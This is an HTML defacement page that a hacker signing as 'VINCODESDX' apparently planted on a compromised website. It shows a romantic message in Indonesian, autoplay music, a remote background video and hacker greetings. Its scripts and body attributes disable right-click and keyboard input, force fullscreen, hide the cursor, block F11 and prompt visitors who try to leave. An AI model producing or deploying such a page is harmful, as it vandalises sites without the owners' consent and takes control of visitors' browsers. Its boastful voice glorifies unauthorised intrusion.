<html>
     <head>
        <title>Defaced By VINCODESDX//.</title>
        <meta charset="UTF-8"/>
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1"/>
        	
<link rel="shortcut icon" href="My_love.jpg">
        <link rel="icon" type="image/x-icon" href="My_love.jpg">
        <meta name="title" content="Hacked by Vinxploitz">
        <meta name="description" content="My Love Atira:)">
        <meta name="keywords" content="hacked,deface,wordpress,website,whitehat,blackhat,defacer,hack,mirror">
        <meta name="robots" content="index, follow">
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <meta name="language" content="English">
        <meta name="revisit-after" content="60 days">
        <meta name="author" content="Mr.Vinxploitz">
        <meta property="og:image" content="My_love.jpg">
        <meta name="theme-color" content="#000">
        <style type='text/css'>
            body,a:hover {
                cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur),progress!important;
            }
        </style>
        <link rel="stylesheet" href="https://bit.ly/2UGCIC5">
    </head>
    <body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body">
        <style type="text/css">
            center {
                font-family: Courier;
            }

            img {
                opacity: 80%;
            }

            red {
                color: red;
            }

            #background-video {
                height: 100vh;
                width: 100vw;
                object-fit: cover;
                position: fixed;
                left: 0;
                right: 0;
                top: 0;
                bottom: 0;
                z-index: -1;
            }

            font {
                text-shadow: #000 0px 0px 3px;
                -webkit-font-smoothing: antialiased;
            }
            button {
                display: block;
                margin: 10px auto 0;
                padding: 10px 20px;
                background-color: #4CAF50;
                color: #fff;
                border: none;
                border-radius: 5px;
                font-size: 16px;
                cursor: pointer;
            }
        </style>
        <script language="JavaScript">
            window.onbeforeunload = confirmExit;
            function confirmExit() {
                return "are you sure ? wkwk";
            }
            function fs() {
                var elem = document.documentElement;
                if (elem.requestFullscreen) {
                    elem.requestFullscreen();
                } else if (elem.msRequestFullscreen) {
                    elem.msRequestFullscreen();
                } else if (elem.mozRequestFullScreen) {
                    elem.mozRequestFullScreen();
                } else if (elem.webkitRequestFullscreen) {
                    elem.webkitRequestFullscreen();
                }
                document.getElementById("body").style.cursor = 'none';
                document.onkeydown = function(e) {
                    return false;
                }
                document.addEventListener("keydown", e=>{
                    if (e.key == "F11")
                        e.preventDefault();
                }
                );
            }
        </script>
        <audio src="NECKDEEP_x_Keisya.m4a" autoplay="true" id="lagu"></audio>
        <video id="background-video" src="https://github.com/anonseven/heker/raw/main/videoplayback.mp4" autoplay="" loop="" muted="" poster="data:image/png;base64, iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=">
            <source src="https://github.com/anonseven/heker/raw/main/videoplayback.mp4" type="video/mp4">
        </video>
        <table width="100%" height="80%">
            <td>
                <center>
                    <small>My Love Atira:3</small>
                    <br>
                    <img src="Vincodesdx.png" width="220" height="220" loading="lazy" onerror="this.style.display = 'none'">
                    <br>
                    Hacked by 
                    <red>
                        <i>VINCODESDX</i>
                    </red>
                    <br>
                    <font size="2">
                       Dear my love kamu adalah terminalku, dimana aku menghabiskan waktuku untuk mengetikan beribu baris kode cinta untukmu,tetaplah tersenyum dan berbahagia slalu karena senyuman dan kebahagiaan mu adalah 2hal yang sangat berarti untuk ku :)
                    Tanggal jadian- 05-mei-2024<br>
                    </font>
                    <br>
                    <br>
                    <small>
                        <button class="button">Go Fullscreen</button>
                    </small>
                    <div class="footer-greetings">
                        <marquee>
                            <font size="2">
                                <b>Greetz</b>
                            </> Vinxploitz - Solo No Team
        
                            </font>
                        </marquee>
                    </div>
            </td>
        </table>